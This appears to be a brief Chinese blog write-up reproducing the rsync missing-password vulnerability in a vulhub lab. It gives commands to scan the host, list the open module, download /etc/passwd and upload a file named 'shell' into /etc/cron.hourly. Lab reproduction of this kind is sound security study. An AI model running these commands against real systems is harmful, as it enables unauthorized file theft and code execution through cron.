rsync介绍
rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口。
漏洞详情
就是忘记设置密码了。水一波选择这个漏洞。
漏洞复现
vulhub进行环境的搭建。开始进行端口的扫描
nmap -A 192.168.1.134
然后使用kali中的rsync进行漏洞利用
rsync rsync://192.168.1.134/src
已经看到了所有文件了。现在使用一下rsync中上传和下载的命令进行熟悉
rsync -av rsync://192.168.1.134/src/etc/passwd /root/passwd.txt
rsync -av shell rsync://192.168.1.134/src/etc/cron.hourly
上传的时候文件在前面,下载的时候文件在后面。已经可以上传下载了,这就等于大路通了。水完一波